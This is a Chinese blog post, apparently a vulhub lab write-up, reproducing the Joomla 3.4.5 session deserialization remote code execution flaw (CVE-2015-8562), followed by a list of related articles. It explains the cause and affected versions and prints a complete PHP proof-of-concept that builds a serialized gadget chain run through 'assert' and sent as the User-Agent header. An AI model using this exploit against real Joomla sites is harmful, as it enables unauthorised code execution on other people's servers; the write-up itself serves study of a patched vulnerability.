Joomla 3.4.5 反序列化漏洞 CVE-2015-8562 漏洞复现

最新推荐文章于 2022-02-04 16:30:24 发布
最新推荐文章于 2022-02-04 16:30:24 发布
阅读量541 收藏 1
点赞数
分类专栏: vulhub_Writeup 文章标签: 网络安全 安全漏洞 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43416469/article/details/114305013
版权

Joomla 3.4.5 反序列化漏洞(CVE-2015-8562)

by ADummy

0x00利用路线

​ burpsuite抓包改包—>命令执行

0x01漏洞介绍

​ 本漏洞根源是PHP5.6.13前的版本在读取存储好的session时,如果反序列化出错则会跳过当前一段数据而去反序列化下一段数据。而Joomla将session存储在Mysql数据库中,编码是utf8,当我们插入4字节的utf8数据时则会导致截断。截断后的数据在反序列化时就会失败,最后触发反序列化漏洞。通过Joomla中的Gadget,可造成任意代码执行的结果。

​ 影响版本

Joomla 1.5.x, 2.x, and 3.x before 3.4.6
PHP 5.6 < 5.6.13, PHP 5.5 < 5.5.29 and PHP 5.4 < 5.4.45

0x02漏洞复现

安装joomla,
数据库地址:mysql:3306
用户:root
密码:root
数据库名:joomla
填入上述信息,正常安装即可。

然后我们不带User-Agent头,先访问一次目标主页,记下服务端返回的Cookie:

在这里插入图片描述
在这里插入图片描述

再用如下脚本生成POC:(在线运行

<?php
class JSimplepieFactory {
}
class JDatabaseDriverMysql {

}
class SimplePie {
    var $sanitize;
    var $cache;
    var $cache_name_function;
    var $javascript;
    var $feed_url;
    function __construct()
    {
        $this->feed_url = "phpinfo();JFactory::getConfig();exit;";
        $this->javascript = 9999;
        $this->cache_name_function = "assert";
        $this->sanitize = new JDatabaseDriverMysql();
        $this->cache = true;
    }
}

class JDatabaseDriverMysqli {
    protected $a;
    protected $disconnectHandlers;
    protected $connection;
    function __construct()
    {
        $this->a = new JSimplepieFactory();
        $x = new SimplePie();
        $this->connection = 1;
        $this->disconnectHandlers = [
            [$x, "init"],
        ];
    }
}

$a = new JDatabaseDriverMysqli();
$poc = serialize($a); 

$poc = str_replace("\x00*\x00", '\\0\\0\\0', $poc);

echo "123}__test|{$poc}\xF0\x9D\x8C\x86";

在这里插入图片描述
将生成好的POC作为User-Agent,带上第一步获取的Cookie发包,这一次发包,脏数据进入Mysql数据库。然后同样的包再发一次,我们的代码被执行:
在这里插入图片描述

ADummy_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用Vulnhub复现漏洞 - Joomla 3.4.5 反序列化漏洞CVE-2015-8562
JiangBuLiu的博客
07-11 2491
Joomla 3.4.5 反序列化漏洞CVE-2015-8562)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现并未成功POC Vulnhub官方复现教程 https://vulhub.org/#/environments/joomla/CVE-2015-8562/ 漏洞原理 本漏洞根源是PHP5.6.13前的版本在读取存储好的session时,如果反序列化出错则会跳过当前一段数据而...
Joomla 3.4.5 反序列化漏洞CVE-2015-8562
锋刃科技的博客
06-18 842
简介 本漏洞根源是PHP5.6.13前的版本在读取存储好的session时,如果反序列化出错则会跳过当前一段数据而去反序列化下一段数据。而Joomla将session存储在Mysql数据库中,编码是utf8,当我们插入4字节的utf8数据时则会导致截断。截断后的数据在反序列化时就会失败,最后触发反序列化漏洞。 影响版本 Joomla 1.5.x, 2.x, and 3.x before 3.4.6 PHP 5.6 < 5.6.13, PHP 5.5 < 5.5.29 and PHP 5.
漏洞复现Joomla: RCE/CVE-2017-8917/CVE-2015-8562
weixin_44508748的博客
03-22 1497
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Ma...
CVE-2015-7857 Joomla注入漏洞利用工具
04-18
**Joomla CMS与CVE-2015-7857注入漏洞** Joomla是一款流行的开源内容管理系统(CMS),用于构建各种类型的网站,包括企业、新闻、博客等。它的强大功能和灵活性使其成为全球众多用户的首选。然而,随着广泛使用,...
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境
最新发布
07-06
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境
CVE-2020-11890:CVE-2020-11890
03-10
CVE-2020-11890:用户组表类中的输入验证不正确可能会导致RCE的ACL配置损坏 关联 PoC 受影响的版本:3.9.17之前的Joomla核心 用户要求:管理员帐户(非超级管理员) 获得访问权限:创建一个新的超级管理员,然后触发...
Java反序列化漏洞利用工具(joomla
01-01
Java反序列化漏洞是软件安全领域的一个重要话题,尤其在Java应用程序中,它可能导致严重的安全风险。本工具针对的是Joomla平台,一个广泛使用的开源内容管理系统(CMS)。Joomla的某些版本存在Java反序列化漏洞,...
cve-2023-23752扫描poc
04-24
joomla未授权访问cve-2023-23752扫描poc: Joomla是一套全球知名的内容管理系统(CMS),其使用PHP语言加上MySQL数据库所开发,可以在Linux、Windows、MacOSX等各种不同的平台上运行。 2月16日,Joomla官方发布安全...
Joomla反序列化漏洞
Kevin's Blog
01-18 661
文章目录一、介绍1.1 漏洞原理1.2 影响版本二、漏洞复现2.1 配置环境2.2 漏洞复现三、防御措施 一、介绍 1.1 漏洞原理   PHP5.6.13前的版本在读取存储好的session时,如果反序列化出错则会跳过当前一段数据而去反序列化下一段数据。而Joomla将session存储在Mysql数据库中,编码是utf8,当我们插入4字节的utf8数据时则会导致截断。截断后的数据在反序列化时就会失败,最后触发反序列化漏洞。 1.2 影响版本 joomla<3.4.6 PHP 5.6 <5.6
mysql 反序列化_Joomla 3.4.5 反序列化漏洞CVE-2015-8562) 分析
weixin_39950470的博客
12-10 460
0x00在一番深思之后准备开始理解各大cms厂商的CVE漏洞。作为国外大佬之一的joomla是一个不错选择。依据便捷有效的观点,我在vulhub找到了joomla的典型漏洞之一 cve-2015-8562作为第一个下手的目标。0x01在初步了解漏洞之后决定开始进行测试。在通过vulhub的docker创建镜像时遇到几个问题:1.国外的源并不更新或更新很慢;2.vulhub使用的debian现在已经...
php+反序列化代码执行漏洞,session反序列化代码执行漏洞分析[Joomla RCE]
weixin_35875219的博客
03-11 221
Author:L.N.@360adlab0x01 漏洞影响版本PHP < 5.6.130x02 joomla利用程序分析joomla具体漏洞分析请看phith0n牛分析文章,本文只讨论此漏洞的核心问题所在。利用程序poc:}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"di...
joomla 3.4.5 php版本,Joomla3.4.6漏洞最强总结
weixin_29338361的博客
04-04 362
距离Joomla漏洞爆出已经有一段时间了,网上资料也出来很多了,不过大多都是类似的,我这边参考总结了一下,顺便加了一点本地化复现和分析的干货。0x01漏洞介绍Joomla是一套全球知名的内容管理系统,是使用PHP语言加上MySQL数据库所开发的软件系统。漏洞本质是Joomla对session数据处理不当,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,获取服务器权限,实现远程命令执行。0x...
vulhub漏洞复现32_Joomla
weixin_44193247的博客
02-04 1033
vulhub漏洞复现练习篇
Joomla 3.4.5 反序列化漏洞
qq_41048303的博客
12-29 2355
Joomla 3.4.5 反序列化漏洞 1.漏洞原理 ​ 本漏洞根源是PHP5.6.13前的版本在读取存储号的session时,如果反序列化出错则会跳过当前一段数据而去反序列化下一段数据。而Joomla将session存储在Mysql数据库中,编码是utf8,当我们插入4字节的utf8数据时则会导致截断。截断后的数据在反序列化时就会失败,最后触发反序列化漏洞。 2.漏洞环境 docker-compose up -d # 启动后访问http://192.168.184.130:8080/ ​ 3.漏洞
XStream Deserializable Vulnerablity And Groovy CVE-2015-3253漏洞分析
weixin_34283445的博客
11-09 150
【转】https://www.iswin.org/2016/02/27/Xstream-Deserializable-Vulnerablity-And-Groovy-CVE-2015-3253/ 本文转自fatshi51CTO博客,原文链接:http://blog.51cto.com/duallay/1963045,如需转载请自...
joomla漏洞_Joomla关键零日漏洞–远程命令执行漏洞
culin0274的博客
08-11 199
joomla漏洞 CVE编号:CVE​​-2015-8562 (CVE Numbers: CVE-2015-8562) A recently discoveredzero day vulnerability within Joomlais currently being actively exploited, thisvulnerabilityallowsan attackerto t...
mysql漏洞2017,Joomla! 3.7 Core SQL 注入 (CVE-2017-8917)漏洞分析
06-01
MySQL漏洞2017指的是MySQL数据库在2017年发现的一个安全漏洞,该漏洞允许攻击者通过在MySQL服务器上注入恶意代码来获取数据库中的敏感信息或者执行恶意操作。 Joomla! 3.7 Core SQL注入漏洞(CVE-2017-8917)是一个影响Joomla! CMS的安全漏洞,该漏洞允许攻击者通过在搜索模块中注入恶意SQL代码来获取网站的敏感信息或者执行恶意操作。 该漏洞的原因是由于Joomla! CMS的搜索模块没有对用户输入进行充分验证和过滤,导致攻击者可以在搜索框中注入恶意代码。攻击者可以使用这个漏洞来执行SQL查询,访问和修改数据库中的数据。 为了修复这个漏洞Joomla! CMS发布了一个补丁程序,该程序在搜索模块中添加了额外的输入验证和过滤,以防止攻击者注入恶意代码。 对于使用Joomla! CMS的网站管理员来说,他们应该及时更新到最新版本,以确保自己的网站不会受到这个漏洞的影响。同时,他们也应该定期检查和审计自己的网站,以及对用户输入进行充分验证和过滤,从而减少安全漏洞的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值